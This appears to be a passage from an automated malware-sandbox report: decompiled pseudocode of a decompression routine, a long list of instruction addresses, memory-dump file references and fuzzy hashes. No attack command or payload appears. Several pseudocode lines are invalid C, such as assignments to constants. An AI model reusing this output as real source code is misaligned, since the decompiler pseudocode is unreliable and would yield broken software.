													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                0x00000000
                0x00406473
                0x00406473
                0x00406477
                0x00406498
                0x0040649f
                0x004064a5
                0x004064ab
                0x004064bd
                0x004064c3
                0x004064c8
                0x00000000
                0x00406479
                0x0040647f
                0x00406840
                0x00406840
                0x00406840
                0x00406843
                0x00406843
                0x00406843
                0x00406849
                0x0040684f
                0x00406855
                0x0040686f
                0x00406872
                0x00406878
                0x00406883
                0x00406885
                0x00406857
                0x00406857
                0x00406866
                0x0040686a
                0x0040686a
                0x0040688f
                0x00000000
                0x00000000
                0x00406891
                0x00406895
                0x00406a44
                0x00406a5a
                0x00406a62
                0x00406a69
                0x00406a6b
                0x00406a72
                0x00406a76
                0x00406a76
                0x004068a1
                0x004068a8
                0x004068b0
                0x004068b3
                0x004068b6
                0x004068b6
                0x004068bc
                0x004068bc
                0x00406058
                0x00406058
                0x00406058
                0x00406061
                0x00000000
                0x00000000
                0x00406067
                0x00000000
                0x00406072
                0x00000000
                0x00000000
                0x0040607b
                0x0040607e
                0x00406081
                0x00406085
                0x00000000
                0x00000000
                0x0040608b
                0x0040608e
                0x00406090
                0x00406091
                0x00406094
                0x00406096
                0x00406097
                0x00406099
                0x0040609c
                0x004060a1
                0x004060a6
                0x004060af
                0x004060c2
                0x004060c5
                0x004060d1
                0x004060f9
                0x004060fb
                0x00406109
                0x00406109
                0x0040610d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004060fd
                0x004060fd
                0x00406100
                0x00406101
                0x00406101
                0x00000000
                0x004060fd
                0x004060d7
                0x004060dc
                0x004060dc
                0x004060e5
                0x004060ed
                0x004060f0
                0x00000000
                0x004060f6
                0x004060f6
                0x00000000
                0x004060f6
                0x00000000
                0x00406113
                0x00406113
                0x00406117
                0x004069c3
                0x00000000
                0x004069c3
                0x00406120
                0x00406130
                0x00406133
                0x00406136
                0x00406136
                0x00406136
                0x00406139
                0x0040613d
                0x00000000
                0x00000000
                0x0040613f
                0x00406145
                0x0040616f
                0x00406175
                0x0040617c
                0x00000000
                0x0040617c
                0x0040614b
                0x0040614e
                0x00406153
                0x00406153
                0x0040615e
                0x00406166
                0x00406169
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004061ae
                0x004061b4
                0x004061b7
                0x004061c4
                0x004061cc
                0x00000000
                0x00000000
                0x00406183
                0x00406183
                0x00406187
                0x004069d2
                0x00000000
                0x004069d2
                0x00406193
                0x0040619e
                0x0040619e
                0x0040619e
                0x004061a1
                0x004061a4
                0x004061a7
                0x004061ac
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406843
                0x00406843
                0x00406849
                0x0040684f
                0x00406855
                0x0040686f
                0x00406872
                0x00406878
                0x00406883
                0x00406885
                0x00406857
                0x00406857
                0x00406866
                0x0040686a
                0x0040686a
                0x0040688f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004061d4
                0x004061d6
                0x004061d9
                0x0040624a
                0x0040624d
                0x00406250
                0x00406257
                0x00406261
                0x00406840
                0x00406840
                0x00000000
                0x00406840
                0x004061db
                0x004061df
                0x004061e2
                0x004061e4
                0x004061e7
                0x004061ea
                0x004061ec
                0x004061ef
                0x004061f1
                0x004061f6
                0x004061f9
                0x004061fc
                0x00406200
                0x00406207
                0x0040620a
                0x00406211
                0x00406215
                0x0040621d
                0x0040621d
                0x0040621d
                0x00406217
                0x00406217
                0x00406217
                0x0040620c
                0x0040620c
                0x0040620c
                0x00406221
                0x00406224
                0x00406242
                0x00406244
                0x00000000
                0x00406226
                0x00406226
                0x00406229
                0x0040622c
                0x0040622f
                0x00406231
                0x00406231
                0x00406231
                0x00406234
                0x00406237
                0x00406239
                0x0040623a
                0x0040623d
                0x00000000
                0x0040623d
                0x00000000
                0x00000000
                0x00000000
                0x004064dd
                0x004064e1
                0x00406504
                0x00406507
                0x0040650a
                0x00406514
                0x004064e3
                0x004064e3
                0x004064e6
                0x004064e9
                0x004064ec
                0x004064f9
                0x004064fc
                0x004064fc
                0x00406840
                0x00406840
                0x00406840
                0x00000000
                0x00406840
                0x00000000
                0x00406520
                0x00406524
                0x00000000
                0x00000000
                0x0040652a
                0x0040652e
                0x00000000
                0x00000000
                0x00406534
                0x00406536
                0x0040653a
                0x0040653a
                0x0040653d
                0x00406541
                0x00000000
                0x00000000
                0x00406591
                0x00406595
                0x0040659c
                0x0040659f
                0x004065a2
                0x004065ac
                0x00406840
                0x00406840
                0x00406840
                0x00000000
                0x00406840
                0x00406840
                0x00406597
                0x00000000
                0x00000000
                0x004065b8
                0x004065bc
                0x004065c3
                0x004065c6
                0x004065c9
                0x004065be
                0x004065be
                0x004065be
                0x004065cc
                0x004065cf
                0x004065d2
                0x004065d2
                0x004065d5
                0x004065d8
                0x004065db
                0x004065db
                0x004065de
                0x004065e5
                0x004065ea
                0x00000000
                0x00000000
                0x00406678
                0x00406678
                0x0040667c
                0x00406a1a
                0x00000000
                0x00406a1a
                0x00406682
                0x00406685
                0x00406688
                0x0040668c
                0x0040668f
                0x00406695
                0x00406697
                0x00406697
                0x00406697
                0x0040669a
                0x0040669d
                0x00000000
                0x00000000
                0x0040626d
                0x0040626d
                0x00406271
                0x004069de
                0x00000000
                0x004069de
                0x00406277
                0x0040627a
                0x0040627d
                0x00406281
                0x00406284
                0x0040628a
                0x0040628c
                0x0040628c
                0x0040628c
                0x0040628f
                0x00406292
                0x00406292
                0x00406295
                0x00406298
                0x00000000
                0x00000000
                0x0040629e
                0x004062a4
                0x00000000
                0x00000000
                0x004062aa
                0x004062aa
                0x004062ae
                0x004062b1
                0x004062b4
                0x004062b7
                0x004062ba
                0x004062bb
                0x004062be
                0x004062c0
                0x004062c6
                0x004062c9
                0x004062cc
                0x004062cf
                0x004062d2
                0x004062d5
                0x004062d8
                0x004062f4
                0x004062f7
                0x004062fa
                0x004062fd
                0x00406304
                0x00406308
                0x0040630a
                0x0040630e
                0x004062da
                0x004062da
                0x004062de
                0x004062e6
                0x004062eb
                0x004062ed
                0x004062ef
                0x004062ef
                0x00406311
                0x00406318
                0x0040631b
                0x00000000
                0x00406321
                0x00000000
                0x00406321
                0x00000000
                0x00406326
                0x00406326
                0x0040632a
                0x004069ea
                0x00000000
                0x004069ea
                0x00406330
                0x00406333
                0x00406336
                0x0040633a
                0x0040633d
                0x00406343
                0x00406345
                0x00406345
                0x00406345
                0x00406348
                0x0040634b
                0x0040634b
                0x0040634b
                0x00406351
                0x00000000
                0x00000000
                0x00406353
                0x00406356
                0x00406359
                0x0040635c
                0x0040635f
                0x00406362
                0x00406365
                0x00406368
                0x0040636b
                0x0040636e
                0x00406371
                0x00406389
                0x0040638c
                0x0040638f
                0x00406392
                0x00406392
                0x00406395
                0x00406399
                0x0040639b
                0x00406373
                0x00406373
                0x0040637b
                0x00406380
                0x00406382
                0x00406384
                0x00406384
                0x0040639e
                0x004063a5
                0x004063a8
                0x00000000
                0x004063aa
                0x00000000
                0x004063aa
                0x004063a8
                0x004063af
                0x004063af
                0x004063af
                0x004063af
                0x00000000
                0x00000000
                0x004063ea
                0x004063ea
                0x004063ee
                0x004069f6
                0x00000000
                0x004069f6
                0x004063f4
                0x004063f7
                0x004063fa
                0x004063fe
                0x00406401
                0x00406407
                0x00406409
                0x00406409
                0x00406409
                0x0040640c
                0x0040640f
                0x0040640f
                0x00406415
                0x004063b3
                0x004063b3
                0x004063b6
                0x00000000
                0x004063b6
                0x00406417
                0x00406417
                0x0040641a
                0x0040641d
                0x00406420
                0x00406423
                0x00406426
                0x00406429
                0x0040642c
                0x0040642f
                0x00406432
                0x00406435
                0x0040644d
                0x00406450
                0x00406453
                0x00406456
                0x00406456
                0x00406459
                0x0040645d
                0x0040645f
                0x00406437
                0x00406437
                0x0040643f
                0x00406444
                0x00406446
                0x00406448
                0x00406448
                0x00406462
                0x00406469
                0x0040646c
                0x00000000
                0x0040646e
                0x00000000
                0x0040646e
                0x00000000
                0x004066fb
                0x004066fb
                0x004066ff
                0x00406a26
                0x00000000
                0x00406a26
                0x00406705
                0x00406708
                0x0040670b
                0x0040670f
                0x00406712
                0x00406718
                0x0040671a
                0x0040671a
                0x0040671a
                0x0040671d
                0x00000000
                0x00000000
                0x004064cb
                0x004064cb
                0x004064ce
                0x00406840
                0x00406840
                0x00406840
                0x00000000
                0x00406840
                0x00000000
                0x0040680a
                0x0040680e
                0x00406830
                0x00406833
                0x0040683d
                0x00406840
                0x00406840
                0x00406840
                0x00000000
                0x00406840
                0x00406840
                0x00406810
                0x00406813
                0x00406817
                0x0040681a
                0x0040681a
                0x0040681d
                0x00000000
                0x00000000
                0x004068c7
                0x004068cb
                0x004068e9
                0x004068e9
                0x004068e9
                0x004068f0
                0x004068f7
                0x004068fe
                0x004068fe
                0x00000000
                0x004068fe
                0x004068cd
                0x004068d0
                0x004068d3
                0x004068d6
                0x004068dd
                0x00406821
                0x00406821
                0x00406824
                0x00000000
                0x00000000
                0x004069b8
                0x004069bb
                0x004068bc
                0x00000000
                0x00000000
                0x004065f2
                0x004065f4
                0x004065fb
                0x004065fc
                0x004065fe
                0x00406601
                0x00000000
                0x00000000
                0x00406609
                0x0040660c
                0x0040660f
                0x00406611
                0x00406613
                0x00406613
                0x00406614
                0x00406617
                0x0040661e
                0x00406621
                0x0040662f
                0x00000000
                0x00000000
                0x00406905
                0x00406905
                0x00406908
                0x0040690f
                0x00000000
                0x00000000
                0x00406914
                0x00406914
                0x00406918
                0x00406a50
                0x00000000
                0x00406a50
                0x0040691e
                0x00406921
                0x00406924
                0x00406928
                0x0040692b
                0x00406931
                0x00406933
                0x00406933
                0x00406933
                0x00406936
                0x00406939
                0x00406939
                0x00406939
                0x00406939
                0x0040693c
                0x0040693c
                0x00406940
                0x004069a0
                0x004069a3
                0x004069a8
                0x004069a9
                0x004069ab
                0x004069ad
                0x004069b0
                0x004068bc
                0x004068bc
                0x00000000
                0x004068c2
                0x004068bc
                0x00406942
                0x00406948
                0x0040694b
                0x0040694e
                0x00406951
                0x00406954
                0x00406957
                0x0040695a
                0x0040695d
                0x00406960
                0x00406963
                0x0040697c
                0x0040697f
                0x00406982
                0x00406985
                0x00406989
                0x0040698b
                0x0040698b
                0x0040698c
                0x0040698f
                0x00406965
                0x00406965
                0x0040696d
                0x00406972
                0x00406974
                0x00406977
                0x00406977
                0x00406992
                0x00406999
                0x00000000
                0x0040699b
                0x00000000
                0x0040699b
                0x00000000
                0x00406637
                0x0040663a
                0x00406670
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a3
                0x004067a3
                0x004067a6
                0x004067a8
                0x00406a32
                0x00000000
                0x00406a32
                0x004067ae
                0x004067b1
                0x00000000
                0x00000000
                0x004067b7
                0x004067bb
                0x004067be
                0x004067be
                0x004067be
                0x00000000
                0x004067be
                0x0040663c
                0x0040663e
                0x00406640
                0x00406642
                0x00406645
                0x00406646
                0x00406648
                0x0040664a
                0x0040664d
                0x00406650
                0x00406666
                0x0040666b
                0x004066a3
                0x004066a3
                0x004066a7
                0x004066d3
                0x004066d5
                0x004066dc
                0x004066df
                0x004066e2
                0x004066e2
                0x004066e7
                0x004066e7
                0x004066e9
                0x004066ec
                0x004066f3
                0x004066f6
                0x00406723
                0x00406723
                0x00406726
                0x00406729
                0x0040679d
                0x0040679d
                0x0040679d
                0x00000000
                0x0040679d
                0x0040672b
                0x00406731
                0x00406734
                0x00406737
                0x0040673a
                0x0040673d
                0x00406740
                0x00406743
                0x00406746
                0x00406749
                0x0040674c
                0x00406765
                0x00406767
                0x0040676a
                0x0040676b
                0x0040676e
                0x00406770
                0x00406773
                0x00406775
                0x00406777
                0x0040677a
                0x0040677c
                0x0040677f
                0x00406783
                0x00406785
                0x00406785
                0x00406786
                0x00406789
                0x0040678c
                0x0040674e
                0x0040674e
                0x00406756
                0x0040675b
                0x0040675d
                0x00406760
                0x00406760
                0x0040678f
                0x00406796
                0x00406720
                0x00406720
                0x00406720
                0x00406720
                0x00000000
                0x00406798
                0x00000000
                0x00406798
                0x00406796
                0x004066a9
                0x004066ac
                0x004066ae
                0x004066b1
                0x004066b4
                0x004066b7
                0x004066b9
                0x004066bc
                0x004066bf
                0x004066bf
                0x004066c2
                0x004066c2
                0x004066c5
                0x004066cc
                0x004066a0
                0x004066a0
                0x004066a0
                0x004066a0
                0x00000000
                0x004066ce
                0x00000000
                0x004066ce
                0x004066cc
                0x00406652
                0x00406655
                0x00406657
                0x0040665a
                0x00000000
                0x00000000
                0x004063b9
                0x004063b9
                0x004063bd
                0x00406a02
                0x00000000
                0x00406a02
                0x004063c3
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d2
                0x004063d5
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e2
                0x004063e2
                0x004063e2
                0x00000000
                0x00000000
                0x00406544
                0x00406544
                0x00406548
                0x00406a0e
                0x00000000
                0x00406a0e
                0x0040654e
                0x00406551
                0x00406554
                0x00406557
                0x00406559
                0x00406559
                0x00406559
                0x0040655c
                0x0040655f
                0x00406562
                0x00406565
                0x00406568
                0x0040656b
                0x0040656c
                0x0040656e
                0x0040656e
                0x0040656e
                0x00406571
                0x00406574
                0x00406577
                0x0040657a
                0x0040657a
                0x0040657a
                0x0040657d
                0x0040657f
                0x0040657f
                0x00000000
                0x00000000
                0x004067c1
                0x004067c1
                0x004067c1
                0x004067c5
                0x00000000
                0x00000000
                0x004067cb
                0x004067ce
                0x004067d1
                0x004067d4
                0x004067d6
                0x004067d6
                0x004067d6
                0x004067d9
                0x004067dc
                0x004067df
                0x004067e2
                0x004067e5
                0x004067e8
                0x004067e9
                0x004067eb
                0x004067eb
                0x004067eb
                0x004067ee
                0x004067f1
                0x004067f4
                0x004067f7
                0x004067fa
                0x004067fe
                0x00406800
                0x00406803
                0x00000000
                0x00406805
                0x00406582
                0x00406582
                0x00000000
                0x00406582
                0x00406803
                0x00406a38
                0x00000000
                0x00000000
                0x00406067
                0x00406a6f
                0x00406a6f
                0x00000000
                0x00406a6f
                0x004068bc
                0x00406843
                0x00406840
                0x00000000
                0x00406477

                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                • Instruction ID: ed496f49c15cb1a0cee1f91230a4d4bd76d3fd25087baa69d2252d5f7e71f344
                • Opcode Fuzzy Hash: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                • Instruction Fuzzy Hash: 30713271E00228CFDF28DFA8C8547ADBBB1FB44305F15806AD906BB281D7785A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406591, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E00406591() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
